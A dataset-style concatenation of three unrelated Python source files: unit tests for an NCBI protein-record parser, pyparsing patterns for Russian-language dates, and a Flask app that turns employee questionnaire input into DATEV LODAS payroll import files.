Tests the NCBI.Protein member function 'extract_ec()' on its
ability to retreive the ec number from the hit on the NCBI protein
database.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "CAI38050"
self.assertTrue(ncbi.protein.extract_ec(content, accession) == '4.1.3.36')
# Glucose-1-phosphate adenylyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
self.assertTrue(ncbi.protein.extract_ec(content, accession) == '2.7.7.27')
def test_has_ec(self):
"""
Tests the NCBI.Protein member function 'has_ec()' on its ability to
determine if a hit on NCBI has an ec number reported.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "CAI38050"
self.assertTrue(ncbi.protein.has_ec(content, accession))
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411]2.txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "CAI38050"
self.assertFalse(ncbi.protein.has_ec(content, accession))
# GNAT family N-acetyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_GNAT_family_N_acetyltransferase_[Geobacillus].txt"
with open(path) as f:
content = f.read()
f.close()
self.assertTrue(os.path.isfile(path))
ncbi = NCBI()
accession = "WP_008881006"
self.assertFalse(ncbi.protein.has_ec(content, accession))
# Glucose-1-phosphate adenylyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
self.assertTrue(ncbi.protein.has_ec(content, accession))
# aminodeoxychorismate lyase hit
path = currentdir + "\\test_files\\biopython_entrez_aminodeoxychorismate_lyase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "WP_011887816"
self.assertFalse(ncbi.protein.has_ec(content, accession))
def test_extract_organism(self):
"""
Tests the NCBI.Protein member function 'extract_protein_name()' on its
ability to retreive the organism name from the hit on the NCBI
protein database.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
exp = "Corynebacterium jeikeium K411"
self.assertTrue(ncbi.protein.extract_organism(content) == exp)
# GNAT family N-acetyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_GNAT_family_N_acetyltransferase_[Geobacillus].txt"
with open(path) as f:
content = f.read()
f.close()
self.assertTrue(os.path.isfile(path))
ncbi = NCBI()
exp = "Geobacillus"
self.assertTrue(ncbi.protein.extract_organism(content) == exp)
# Glucose-1-phosphate adenylyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
exp = "Oscillatoria nigro-viridis PCC 7112"
self.assertTrue(ncbi.protein.extract_organism(content) == exp)
# aminodeoxychorismate lyase hit
path = currentdir + "\\test_files\\biopython_entrez_aminodeoxychorismate_lyase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "WP_011887816"
exp = "Geobacillus"
self.assertTrue(ncbi.protein.extract_organism(content) == exp)
def test_extract_Protein_Name(self):
"""
Tests the NCBI.Protein member function 'extract_protein_name()' on its
ability to retreive the protein name from the hit on the NCBI protein
database.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "CAI38050"
exp = "naphthoate synthase"
self.assertTrue(ncbi.protein.extract_protein_name(content, accession) == exp)
# GNAT family N-acetyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_GNAT_family_N_acetyltransferase_[Geobacillus].txt"
with open(path) as f:
content = f.read()
f.close()
self.assertTrue(os.path.isfile(path))
ncbi = NCBI()
accession = "WP_008881006"
exp = "GNAT family N-acetyltransferase"
self.assertTrue(ncbi.protein.extract_protein_name(content, accession) == exp)
# Glucose-1-phosphate adenylyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
exp = "Glucose-1-phosphate adenylyltransferase"
self.assertTrue(ncbi.protein.extract_protein_name(content, accession) == exp)
# aminodeoxychorismate lyase hit
path = currentdir + "\\test_files\\biopython_entrez_aminodeoxychorismate_lyase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "WP_011887816"
exp = "aminodeoxychorismate lyase"
self.assertTrue(ncbi.protein.extract_protein_name(content, accession) == exp)
def test_extract_info(self):
"""
Tests the NCBI.Protein member function 'extract_info()' on its ability
to retreive the protein name, organism, and ec number (if available)
from the hit on the NCBI protein database.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
ncbi = NCBI()
accession = "CAI38050"
exp = {
'Protein name': 'naphthoate synthase',
'Organism': 'Corynebacterium jeikeium K411',
'EC Number': '4.1.3.36'
}
self.assertTrue(ncbi.protein.extract_info(content, accession) == exp)
f.close()
# GNAT family N-acetyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_GNAT_family_N_acetyltransferase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
ncbi = NCBI()
accession = "WP_008881006"
exp = {
'Protein name': 'GNAT family N-acetyltransferase',
'Organism': 'Geobacillus'
}
self.assertTrue(ncbi.protein.extract_info(content, accession) == exp)
f.close()
# Glucose-1-phosphate adenylyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
exp = {
'Protein name': 'Glucose-1-phosphate adenylyltransferase', 'Organism': 'Oscillatoria nigro-viridis PCC 7112',
'EC Number': '2.7.7.27'
}
self.assertTrue(ncbi.protein.extract_info(content, accession) == exp)
# aminodeoxychorismate lyase hit
path = currentdir + "\\test_files\\biopython_entrez_aminodeoxychorismate_lyase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "WP_011887816"
exp = { 'Protein name': 'aminodeoxychorismate lyase',
'Organism': 'Geobacillus'
}
self.assertTrue(ncbi.protein.extract_info(content, accession) == exp)
def test_init(self):
"""
Tests the initialization of the NCBI class and Protein inner class.
:param self: An instance of the NCBI_tests class.
"""
ncbi = NCBI()
self.assertTrue(str(type(ncbi)) == "<class 'classes.NCBI.NCBI'>")
self.assertTrue(str(type(ncbi.protein)) \
== "<class 'classes.NCBI.NCBI.Protein'>")
self.assertTrue(ncbi.root_path == "https://www.ncbi.nlm.nih.gov")
self.assertTrue(ncbi.protein.root_path \
== "https://www.ncbi.nlm.nih.gov/protein/")
def test_execution(self):
"""
Tests the ability of the NCBI_tests class to run a test.
:param self: An instance of the NCBI_tests class.
"""
self.assertTrue(True)
if __name__ == '__main__':
unittest.main() | 41.171521 | 142 | 0.614998 | 1,414 | 12,722 | 5.38331 | 0.10396 | 0.077246 | 0.042433 | 0.052417 | 0.852864 | 0.826064 | 0.820547 | 0.811876 | 0.739228 | 0.724514 | 0 | 0.023765 | 0.282267 | 12,722 | 309 | 143 | 41.171521 | 0.809878 | 0.175523 | 0 | 0.78972 | 0 | 0 | 0.267768 | 0.177683 | 0 | 0 | 0 | 0 | 0.21028 | 1 | 0.037383 | false | 0 | 0.014019 | 0 | 0.056075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
506954b258d7e4c92deceee8fd2acd88b3bfef77 | 6,301 | py | Python | qddate/patterns/ru.py | ivbeg/qddate | f7730610611f2509ab264bc8d77a902742daf08c | [
"BSD-3-Clause"
] | 11 | 2018-01-15T08:54:33.000Z | 2022-01-25T09:08:48.000Z | qddate/patterns/ru.py | ivbeg/qddate | f7730610611f2509ab264bc8d77a902742daf08c | [
"BSD-3-Clause"
] | null | null | null | qddate/patterns/ru.py | ivbeg/qddate | f7730610611f2509ab264bc8d77a902742daf08c | [
"BSD-3-Clause"
] | 2 | 2018-01-14T10:25:55.000Z | 2018-03-09T13:27:49.000Z | # -*- coding: utf-8 -*-
from pyparsing import Word, nums, alphas, oneOf, lineStart, lineEnd, Optional, restOfLine, Literal, ParseException, CaselessLiteral
from .base import BASE_DATE_PATTERNS
RUS_MONTHS_ORIG = [u'Январь', u'Февраль', u'Март', u'Апрель', u'Май', u'Июнь', u'Июль', u'Август', u'Сентябрь', u'Октябрь', u'Ноябрь', u'Декабрь']
RUS_MONTHS_ORIG_LC = [u'январь', u'февраль', u'март', u'апрель', u'май', u'июнь', 'июль', u'август', u'сентябрь', u'октябрь', u'ноябрь', u'декабрь']
RUS_MONTHS = [u'Января', u'Февраля', u'Марта', u'Апреля', u'Мая', u'Июня', u'Июля', u'Августа', u'Сентября', u'Октября', u'Ноября', u'Декабря']
RUS_MONTHS_LC = [u'января', u'февраля', u'марта', u'апреля', u'мая', u'июня', u'июля', u'августа', u'сентября', u'октября', u'ноября', u'декабря']
RUS_WEEKDAYS = [u'Понедельник', u'Вторник', u'Среда', u'Четверг', u'Пятница', u'Суббота', u'Воскресение']
RUS_WEEKDAYS_LC = [u'понедельник', u'вторник', u'среда', u'четверг', u'пятница', u'суббота', u'воскресение']
RUS_YEARS = [u'г.', u'года']
# Russian months map
ru_mname2mon = dict((m,i+1) for i,m in enumerate(RUS_MONTHS) if m)
rulc_mname2mon = dict((m,i+1) for i,m in enumerate(RUS_MONTHS_LC) if m)
ru_origmname2mon = dict((m,i+1) for i,m in enumerate(RUS_MONTHS_ORIG) if m)
rulc_origmname2mon = dict((m,i+1) for i,m in enumerate(RUS_MONTHS_ORIG_LC) if m)
BASE_PATTERNS_RU = {
'pat:rus:years' : oneOf(RUS_YEARS),
'pat:rus:weekdays': oneOf(RUS_WEEKDAYS),
'pat:rus:weekdays_lc': oneOf(RUS_WEEKDAYS_LC),
# months names
'pat:rus:months': oneOf(RUS_MONTHS).setParseAction(lambda t: ru_mname2mon[t[0]]),
'pat:rus:months:lc': oneOf(RUS_MONTHS_LC).setParseAction(lambda t: rulc_mname2mon[t[0]]),
# Original months names, very rarely in use
'pat:rus:monthsorig' : oneOf(RUS_MONTHS_ORIG).setParseAction(lambda t: ru_origmname2mon[t[0]]),
'pat:rus:monthsorig:lc' : oneOf(RUS_MONTHS_ORIG_LC).setParseAction(lambda t: rulc_origmname2mon[t[0]]),
}
PATTERNS_RU = [
# Russian patterns
{'key': 'dt:date:date_rus', 'name': 'Date with russian month', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional(',').suppress() + BASE_PATTERNS_RU['pat:rus:months'].setResultsName('month') + Optional(',').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 11, 'max': 20}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:date_rus2', 'name': 'Date with russian month and year word', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional(',').suppress() + BASE_PATTERNS_RU['pat:rus:months'].setResultsName('month') + Optional(',').suppress() + Word(nums, exact=4).setResultsName('year') + Optional(BASE_PATTERNS_RU['pat:rus:years']).suppress(), 'length': {'min': 13, 'max': 20}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:date_rus3', 'name': 'Date with russian year', 'pattern': BASE_DATE_PATTERNS['pat:date:d.m.yyyy'] + BASE_PATTERNS_RU['pat:rus:years'].suppress(), 'length': {'min': 14, 'max': 20}, 'format': "%d.%m.%Y"},
{'key': 'dt:date:date_rus_lc1', 'name': 'Date with russian month', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional(',').suppress() + BASE_PATTERNS_RU['pat:rus:months:lc'].setResultsName('month') + Optional(',').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 10, 'max': 20}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:date_rus_lc2', 'name': 'Date with russian month with year word', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional(',').suppress() + BASE_PATTERNS_RU['pat:rus:months:lc'].setResultsName('month') + Word(nums, exact=4).setResultsName('year') + Optional(BASE_PATTERNS_RU['pat:rus:years']).suppress(), 'length': {'min': 13, 'max': 25}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:weekday_rus', 'name': 'Date with russian month and weekday', 'pattern': BASE_PATTERNS_RU['pat:rus:weekdays'] + Optional(',') + Word(nums, min=1, max=2) + BASE_PATTERNS_RU['pat:rus:months'] + Optional(Literal(',')).suppress() + Word(nums, exact=4).setResultsName('year') + BASE_PATTERNS_RU['pat:rus:years'].suppress(), 'length': {'min': 13, 'max': 20}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:weekday_rus_lc1', 'name': 'Date with russian month and weekday', 'pattern': BASE_PATTERNS_RU['pat:rus:weekdays'] + Optional(',') + Word(nums, min=1, max=2) + BASE_PATTERNS_RU['pat:rus:months:lc'] + Optional(Literal(',')).suppress() + Word(nums, exact=4).setResultsName('year') + BASE_PATTERNS_RU['pat:rus:years'].suppress(), 'length': {'min': 13, 'max': 25}, 'format': "%d %m %Y", 'filter': 1},
{'key': 'dt:date:rus_rare_2', 'name': 'Date with russian month with dots as divider', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Optional('.').suppress() + BASE_PATTERNS_RU['pat:rus:months'].setResultsName('month') + Optional('.').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 11, 'max': 20}, 'format': "%d.%m.%Y", 'filter': 1},
{'key': 'dt:date:rus_rare_3', 'name': 'Date with russian month with dots as divider with low case months', 'pattern': Word(nums, min=1, max=2).setResultsName('day') + Literal('.').suppress() + BASE_PATTERNS_RU['pat:rus:months:lc'].setResultsName('month') + Literal('.').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 11, 'max': 20}, 'format': "%d.%m.%Y", 'filter': 1},
# KHMB Bank http://www.kbhmb.ru/news/
{'key': 'dt:date:rus_rare_5', 'name': 'Russian date stars with month name', 'pattern': BASE_PATTERNS_RU['pat:rus:monthsorig'].setResultsName('month') + Word(nums, min=1, max=2).setResultsName('day') + Literal(',').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 13, 'max': 22}, 'format': "%d %m %Y", 'filter': 1},
# Bank Rus format http://www.bankrus.ru/about/info/g1/news
{'key': 'dt:date:rus_rare_6', 'name': 'Russian date stars with weekday and follows with month name', 'pattern': BASE_PATTERNS_RU['pat:rus:weekdays_lc'].suppress() + Literal(',').suppress() + BASE_PATTERNS_RU['pat:rus:months:lc'].setResultsName('month') + Word(nums, min=1, max=2).setResultsName('day') + Literal(',').suppress() + Word(nums, exact=4).setResultsName('year'), 'length': {'min': 13, 'max': 22}, 'format': "%d %m %Y", 'filter': 1},
]
| 108.637931 | 448 | 0.661641 | 943 | 6,301 | 4.311771 | 0.148462 | 0.036891 | 0.065421 | 0.079439 | 0.800049 | 0.768815 | 0.735121 | 0.730448 | 0.730448 | 0.678554 | 0 | 0.019737 | 0.107443 | 6,301 | 57 | 449 | 110.54386 | 0.703236 | 0.032693 | 0 | 0 | 0 | 0 | 0.335688 | 0.00723 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.057143 | 0 | 0.057143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5090b4167e76341f73965ca91f95262f711b2e84 | 34,124 | py | Python | pbd2lodas.py | MaliziaGrimm/pbd2lodas | a2447084177c87d1f2e8d1e2a7c0c4607bbbde74 | [
"MIT"
] | null | null | null | pbd2lodas.py | MaliziaGrimm/pbd2lodas | a2447084177c87d1f2e8d1e2a7c0c4607bbbde74 | [
"MIT"
] | null | null | null | pbd2lodas.py | MaliziaGrimm/pbd2lodas | a2447084177c87d1f2e8d1e2a7c0c4607bbbde74 | [
"MIT"
] | null | null | null | from flask import Flask
from flask import request
import os, webbrowser
from flask import render_template
from shutil import copyfile
from fpdf import FPDF
import setting
app = Flask(__name__)
@app.route('/')
def homepage():
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
var_textabr="Abrechnungszeitraum ist gewählt "
else:
var_abrmonat="MM"
var_abrjahr="JJJJ"
var_textabr="und wähle dann den Abrechnungszeitraum! "
if os.path.exists("daten/basisdaten.txt"):
var_textstamm="Konfiguration ist vorhanden "
else:
var_textstamm="Lege zuerst eine Konfiguration an "
var_text=var_textstamm+var_textabr
#Version aus setting an index.html übergeben
var_version_titel = setting.Version_Titel
var_version_program = setting.Version_Program
return render_template('index.html', v_version_program=var_version_program, v_version_titel=var_version_titel, v_text=var_text, v_monat=var_abrmonat, v_jahr=var_abrjahr)
# Block ok !
@app.route('/index.html', methods=['POST', 'GET'])
def index():
if request.method == 'POST':
fileziel=open("daten/abrechnungszeitraum.txt","w")
fileziel.write(request.form['form_monat']+"|"+request.form['form_jahr'])
fileziel.close()
var_textabr="Abrechnungszeitraum ist gewählt "
var_abrmonat=request.form['form_monat']
var_abrjahr=request.form['form_jahr']
elif os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
var_textabr="Abrechnungszeitraum ist gewählt "
else:
var_abrmonat="MM"
var_abrjahr="JJJJ"
var_textabr="Fehler: kein Abrechnungszeitraum gewählt! "
if os.path.exists("daten/basisdaten.txt"):
var_textstamm="Konfiguration ist vorhanden "
else:
var_textstamm="Fehler: Konfiguration ist nicht vorhanden! "
var_text=var_textstamm+var_textabr
#Version aus setting an index.html übergeben
var_version_titel = setting.Version_Titel
var_version_program = setting.Version_Program
return render_template('index.html', v_version_program=var_version_program, v_version_titel=var_version_titel, v_text=var_text, v_monat=var_abrmonat, v_jahr=var_abrjahr)
#Block ok
@app.route('/protokoll.html', methods=['POST', 'GET'])
def protokoll():
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Konfiguration ist nicht vorhanden!"
return render_template('index.html', v_text=var_text)
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Es ist noch kein Abrechnungszeitraum ausgewählt! "
return render_template('index.html', v_text=var_text)
# Erstellen einer pdf
if os.path.exists("daten/abrechnungsdaten.txt"):
class PDF(FPDF):
def header(self):
# Logo
self.image('static/image001.png', 10, 8, 33)
# Arial bold 15
self.set_font('Arial', 'B', 15)
# Move to the right
self.cell(80)
# Title
self.cell(80, 10, 'Erfassungsprotokoll', 1, 0, 'C')
# Line break
self.ln(20)
# Page footer
def footer(self):
# Position at 1.5 cm from bottom
self.set_y(-15)
# Arial italic 8
self.set_font('Arial', 'B', 8)
# Page number
self.cell(0, 10, 'Seite ' + str(self.page_no()) + '/{nb}', 0, 0, 'C')
# Instantiation of inherited class
pdf = PDF()
pdf.alias_nb_pages()
pdf.add_page()
pdf.set_font('Arial', '', 10)
protokoll=open("daten/abrechnungsdaten.txt", "r")
for line in protokoll:
pdf.cell(0, 5, str(line), 0, 1)
pdf.output('protokoll.pdf', 'F')
protokoll.close()
# Öffnen der Datei
os.startfile('protokoll.pdf')
else:
var_text="Fehler: Es sind keine Abrechnungsdaten erfasst! "
return render_template('index.html', v_text=var_text)
return render_template('index.html', v_bnr=var_beraternummer, v_mdt=var_mandantenummer, v_monat=var_abrmonat, v_jahr=var_abrjahr)
# Protokoll ok
# kann noch aufbereiten der Daten
#### Personalfragebogen der Daten ####
@app.route('/personalstammdaten.html', methods=['POST', 'GET'])
def personalstammdaten():
## Stammdaten und Abrechnungszeitraum vorhanden?
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Konfiguration ist nicht vorhanden! "
return render_template('index.html', v_text=var_text)
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Es ist noch kein Abrechnungszeitraum ausgewählt! "
return render_template('index.html', v_text=var_text)
if request.method == 'POST':
if os.path.exists("daten/abrechnungsdaten.txt"):
## Datei öffnen und Daten werden angehangen
# print("Datei offen")
fileziel=open("daten/abrechnungsdaten.txt","a")
else:
## Datei neu öffnen und Kopfdaten schreiben
fileziel=open("daten/abrechnungsdaten.txt","w")
# schreiben in Lodas Importdatei
fileziel.write("[Allgemein]\nZiel=LODAS\nVersion_SST=1.0\nBeraterNr=")
fileziel.write(var_beraternummer)
fileziel.write("\nMandantenNr=")
fileziel.write(var_mandantenummer)
fileziel.write("\nDatumsformat=JJJJ-MM-TT")
# Test Datum so wie von Bootstrap kommt
fileziel.write("\nStringbegrenzer='")
fileziel.write("\n\n* LEGENDE:\n* Datei erzeugt mit Tool pbd2lodas\n* AP: Andreé Rosenkranz; andree@rosenkranz.one\n\n")
fileziel.write("* Satzbeschreibungen zur Übergabe von Bewegungsdaten für Mitarbeiter\n[Satzbeschreibung]\n")
fileziel.write("\n10;u_lod_bwd_buchung_standard;abrechnung_zeitraum#bwd;pnr#bwd;la_eigene#bwd;bs_nr#bwd;bs_wert_butab#bwd;kostenstelle#bwd;")
fileziel.write("\n20;u_lod_psd_beschaeftigung;pnr#psd;eintrittdatum#psd;austrittdatum#psd;arbeitsverhaeltnis#psd;schriftl_befristung#psd;datum_urspr_befr#psd;abschl_befr_arbvertr#psd;verl_befr_arbvertr#psd;befr_gr_2_monate#psd;")
fileziel.write("\n21;u_lod_psd_mitarbeiter;pnr#psd;duevo_familienname#psd;duevo_vorname#psd;adresse_strassenname#psd;adresse_strasse_nr#psd;adresse_ort#psd;adresse_plz#psd;staatsangehoerigkeit#psd;geburtsdatum_ttmmjj#psd;geschlecht#psd;familienstand#psd;sozialversicherung_nr#psd;adresse_anschriftenzusatz#psd;gebort#psd;")
fileziel.write("\n22;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;rv_beitragsgruppe#psd;persgrs#psd;schulabschluss#psd;ausbildungsabschluss#psd;stammkostenstelle#psd;")
fileziel.write("\n23;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;regelm_az_mo#psd;regelm_az_di#psd;regelm_az_mi#psd;regelm_az_do#psd;regelm_az_fr#psd;regelm_az_sa#psd;regelm_az_so#psd;")
# 20200114 fileziel.write("\n23;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;")
fileziel.write("\n24;u_lod_psd_steuer;pnr#psd;identifikationsnummer#psd;els_2_haupt_ag_kz#psd;st_klasse#psd;kfb_anzahl#psd;faktor#psd;")
fileziel.write("\n25;u_lod_psd_sozialversicherung;pnr#psd;kz_zuschl_pv_kinderlose#psd;kv_bgrs#psd;rv_bgrs#psd;av_bgrs#psd;pv_bgrs#psd;")
fileziel.write("\n26;u_lod_psd_ma_bank;pnr#psd;ma_bank_zahlungsart#psd;ma_iban#psd;")
fileziel.write("\n27;u_lod_psd_festbezuege;pnr#psd;festbez_id#psd;lohnart_nr#psd;betrag#psd;")
fileziel.write("\n28;u_lod_psd_lohn_gehalt_bezuege;pnr#psd;std_lohn_1#psd;")
fileziel.write("\n\n")
if request.form['form_personalnummer'] == "":
pass
# Fehler wird vom Frontend abgefangen
# print("Fehler PNR")
else:
fileziel.write("\n\n[Stammdaten]\n20;"+request.form['form_personalnummer']+";"+request.form['form_eintrittsdatum']+";"+request.form['form_austrittsdatum']+";;;;;;")
fileziel.write("\n21;"+request.form['form_personalnummer']+";'"+request.form['form_name']+"';'"+request.form['form_vorname']+"';'"+request.form['form_strasse']+"';'"+request.form['form_hausnummer']+"';'"+request.form['form_wohnort']+"';"+request.form['form_plz']+";000;"+request.form['form_gebdatum']+";"+request.form['form_geschlecht']+";;"+request.form['form_svnummer']+";;"+request.form['form_geburtsort']+";")
fileziel.write("\n22;"+request.form['form_personalnummer']+";"+request.form['form_berufsbezeichnung']+";"+request.form['form_rvbeitragsgruppe']+";"+request.form['form_pgr']+";"+request.form['form_schulabschluss']+";"+request.form['form_berufsausbildung']+";"+request.form['form_kostenstelle']+";")
# 20200114 fileziel.write("\n22;"+request.form['form_personalnummer']+";"+request.form['form_berufsbezeichnung']+";"+request.form['form_pgr']+";"+request.form['form_schulabschluss']+";"+request.form['form_berufsausbildung']+";"+request.form['form_kostenstelle']+";")
# neu Tages az eingepflegt
fileziel.write("\n23;"+request.form['form_personalnummer']+";"+request.form['form_waz']+";"+request.form['form_wazmo']+";"+request.form['form_wazdi']+";"+request.form['form_wazmi']+";"+request.form['form_wazdo']+";"+request.form['form_wazfr']+";"+request.form['form_wazsa']+";"+request.form['form_wazso']+";")
# 20200114 fileziel.write("\n23;"+request.form['form_personalnummer']+";"+request.form['form_waz']+";")
fileziel.write("\n24;"+request.form['form_personalnummer']+";"+request.form['form_steuerid']+";"+request.form['form_artderbeschaeftigung']+";"+request.form['form_steuerklasse']+";"+request.form['form_kinderfreibetrag']+";;")
fileziel.write("\n25;"+request.form['form_personalnummer']+";"+request.form['form_elterneigenschaft']+";"+request.form['form_KV']+";"+request.form['form_RV']+";"+request.form['form_AV']+";"+request.form['form_PV']+";")
fileziel.write("\n26;"+request.form['form_personalnummer']+";5;"+request.form['form_iban']+";")
if request.form['form_gehalt'] == "1":
if request.form['form_eurovorkomma'] == "":
pass
else:
# Gehalt eLOA 1
fileziel.write("\n27;"+request.form['form_personalnummer']+";1;1;"+request.form['form_eurovorkomma']+","+request.form['form_euronachkomma']+";")
elif request.form['form_gehalt'] == "2":
# Festlohn eLOA 51
fileziel.write("\n27;"+request.form['form_personalnummer']+";1;51;"+request.form['form_eurovorkomma']+","+request.form['form_euronachkomma']+";")
elif request.form['form_gehalt'] == "3":
# Stundenlohn
fileziel.write("\n28;"+request.form['form_personalnummer']+";"+request.form['form_eurovorkomma']+","+request.form['form_euronachkomma']+";")
else:
pass
fileziel.write("\n[Hinweisdaten]\n")
fileziel.write("Hinweis: PNR: "+request.form['form_personalnummer']+" Krankenkasse: "+request.form['form_krankenkasse']+" Staatsangehörigkeit: "+request.form['form_staatsang']+"\n")
if request.form['form_geburtsland'] == "" and request.form['form_steuerklasse'] == "":
pass
else:
fileziel.write("Hinweis: PNR: "+request.form['form_personalnummer']+" Geburtsland: "+request.form['form_geburtsland']+" Steuerklasse "+request.form['form_steuerklasse'])
## Fehler
if request.form['form_kinderfreibetrag'] == "" and request.form['form_konfession'] == "":
pass
else:
fileziel.write(" Kinderfreibetrag "+request.form['form_kinderfreibetrag']+" Konfession: "+request.form['form_konfession']+"\n")
if request.form['form_freiertext'] == "":
pass
else:
fileziel.write("\n Text aus der Erfassung: "+request.form['form_freiertext']+"\n")
fileziel.close()
else:
pass
